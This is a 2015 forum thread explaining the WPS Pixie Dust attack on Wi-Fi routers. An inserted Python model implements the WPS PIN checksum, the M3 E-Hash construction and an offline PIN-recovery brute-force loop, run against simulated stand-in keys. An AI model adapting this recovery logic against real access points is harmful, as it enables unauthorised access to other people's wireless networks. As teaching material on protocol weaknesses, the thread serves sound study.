WPS Pixie dust attack


WPS Pixie dust attack

Post by cyberdrain on Wed Feb 04, 2015 2:26 pm

The WPS Pixie dust attack is a new (well... August last year) type of attack against WPS that allows recovery of the keys when the M3 handshake is completed. The attack won't work all the time and I couldn't find any tools yet (though figuring it out yourself is way more fun), but the brute force itself is offline, so no more pesky WPS lockout. With this attack WPS cracking becomes a lot easier. Oh and have fun of course :D

Re: WPS Pixie dust attack

Post by Randoph on Wed Feb 04, 2015 2:31 pm

I thought WPS was one of the newer and better methods to secure a network, but as I read from the PDF: "Poor design and implementation". Was I wrong about it being secure, or is this just a personal opinion from the writer?

Re: WPS Pixie dust attack

Post by cyberdrain on Wed Feb 04, 2015 7:04 pm

Randoph wrote: Was I wrong about it being secure or is this just a personal opinion from the writer?

First rule of crypto: don't invent your own. Take a guess as to how WPS was created? They weakened the otherwise secure AES-based WPA2 protocol by adding an extension that was supposed to allow completely safe and easy setup of Wi-Fi. And I guess they did succeed well in the latter.

However, one design mistake allowed for a brute force of the keys (too small a keyspace compared to AES) and another for a brute force within 4 hours (the second part of the key was based on the first). Of course there were no limits to how many keys you could try within a certain time. Oh, and did I mention that once you know the keys used in WPS, you can use those to get the WPA2 keys to the wireless network? Worse still, some routers don't even allow WPS to be completely disabled, even when you specifically 'disable' it. The flaw was found in 2011 and the tool Reaver was released soon afterwards to automate the attack.

Now this new attack sometimes allows for an offline brute force after you get to the third message in the handshake (M3). Simply said, the randomness (entropy) used to generate the random keys used by WPS in some devices is too low. No or low entropy for the creation of new keys means the same or a guessable key is used in the protocol (this is yet another key, not the WPS or AES keys themselves). As the rest of the protocol is based on those keys being random, this allows recovery of the WPS key and ultimately the AES key for the wireless network. It also means the countermeasures designed against WPS brute force (stalling the handshake) have become useless whenever this attack can be used, as the attack is done offline.

Well, at least it isn't as broken yet as WEP was...

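A worked model of the two points made in the post above, the PIN-structure weakness behind the online (Reaver-style) brute force and the pixie-dust offline recovery from M3, as an added example. This is not code from the thread, from the linked PDF, or from any pixie-dust tool. It uses the HMAC-SHA256 constructions of the WPS specification for PSK1/PSK2 and E-Hash1/E-Hash2, but AuthKey, PKE and PKR are random stand-ins for values the real protocol derives from the Diffie-Hellman exchange in M1/M2 (the attacker, acting as registrar, knows all three), the "weak enrollee" is modelled with all-zero E-S1/E-S2 nonces (the simplest low-entropy case), and the function names are my own.

```python
"""
Part 1: the PIN structure that makes the online attack feasible.
Part 2: pixie-dust offline recovery of the PIN from the M3 hashes when the
        enrollee's secret nonces E-S1/E-S2 are predictable.

Constructed data: AuthKey, PKE and PKR below are random stand-ins (assumption);
in the real protocol they come out of the M1/M2 Diffie-Hellman exchange and are
known to the registrar side, which is the attacker.
"""
import hashlib
import hmac
import os
from typing import Optional, Tuple


# ------------------------------------------------------------ Part 1: PIN design

def wps_checksum_digit(first_seven: int) -> int:
    """Checksum (8th) digit of a WPS PIN, computed from the 7-digit prefix."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True when the 8-digit PIN carries a correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum_digit(int(pin[:7])) == int(pin[7])


def wps_online_keyspace() -> Tuple[int, int]:
    """(naive keyspace, keyspace an online attacker actually faces).

    The enrollee reveals after M4 whether the first four digits were right
    (EAP-NACK vs. M5) and after M6 whether the last four were, and the last
    digit is a checksum, so the halves are attacked one after the other:
    10^4 + 10^3 attempts instead of 10^8.
    """
    return 10 ** 8, 10 ** 4 + 10 ** 3


# --------------------------------------------------- Part 2: pixie-dust offline

def wps_psk_half(auth_key: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII digits of the half)."""
    return hmac.new(auth_key, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]


def wps_e_hash(auth_key: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(auth_key, e_s + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3_hashes(auth_key, pke, pkr, pin, e_s1, e_s2) -> Tuple[bytes, bytes]:
    """What the enrollee (the AP) puts in M3 for a given PIN and nonce pair."""
    h1 = wps_e_hash(auth_key, e_s1, wps_psk_half(auth_key, pin[:4]), pke, pkr)
    h2 = wps_e_hash(auth_key, e_s2, wps_psk_half(auth_key, pin[4:]), pke, pkr)
    return h1, h2


def pixie_dust_recover_pin(auth_key, pke, pkr, e_hash1, e_hash2,
                           e_s1_guess, e_s2_guess) -> Optional[str]:
    """Offline PIN recovery from M3. Nothing is sent to the AP, so lockout never triggers.

    Succeeds only when the nonce guesses are right, i.e. when the enrollee's
    nonces are predictable; against fresh 128-bit random nonces it returns None.
    """
    first_half = None
    for i in range(10_000):
        half = f"{i:04d}"
        if wps_e_hash(auth_key, e_s1_guess, wps_psk_half(auth_key, half), pke, pkr) == e_hash1:
            first_half = half
            break
    if first_half is None:
        return None
    # Only 1,000 candidates for the second half: the checksum digit is implied.
    for j in range(1_000):
        prefix7 = int(first_half) * 1000 + j
        second_half = f"{j:03d}{wps_checksum_digit(prefix7)}"
        if wps_e_hash(auth_key, e_s2_guess, wps_psk_half(auth_key, second_half), pke, pkr) == e_hash2:
            return first_half + second_half
    return None


def run_demo(pin: str = "12345670") -> Tuple[Optional[str], Optional[str]]:
    """Returns (PIN recovered from a zero-nonce AP, PIN recovered from a random-nonce AP)."""
    auth_key, pke, pkr = os.urandom(32), os.urandom(192), os.urandom(192)  # constructed stand-ins
    zero = bytes(16)
    # Low-entropy enrollee (assumed model): E-S1 = E-S2 = 0.
    weak_h1, weak_h2 = enrollee_m3_hashes(auth_key, pke, pkr, pin, zero, zero)
    # Correct enrollee: fresh random nonces the attacker cannot guess.
    strong_h1, strong_h2 = enrollee_m3_hashes(auth_key, pke, pkr, pin, os.urandom(16), os.urandom(16))
    weak = pixie_dust_recover_pin(auth_key, pke, pkr, weak_h1, weak_h2, zero, zero)
    strong = pixie_dust_recover_pin(auth_key, pke, pkr, strong_h1, strong_h2, zero, zero)
    return weak, strong


if __name__ == "__main__":
    print("WPS keyspace (naive, effective):", wps_online_keyspace())
    print("recovered from weak AP, strong AP:", run_demo())
```

The recovery loop is the whole point of the offline attack: the attacker stops after M3, never sends an M4 the AP could count against a lockout, and with the recovered PIN simply restarts the exchange and completes it through M7, where the enrollee hands over the network's WPA2 credentials. Against an AP whose nonces are genuinely random the same loop finds nothing, which is why the attack only works on some devices.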
Re: WPS Pixie dust attack

Post by limdis on Thu Feb 05, 2015 5:50 pm

[image]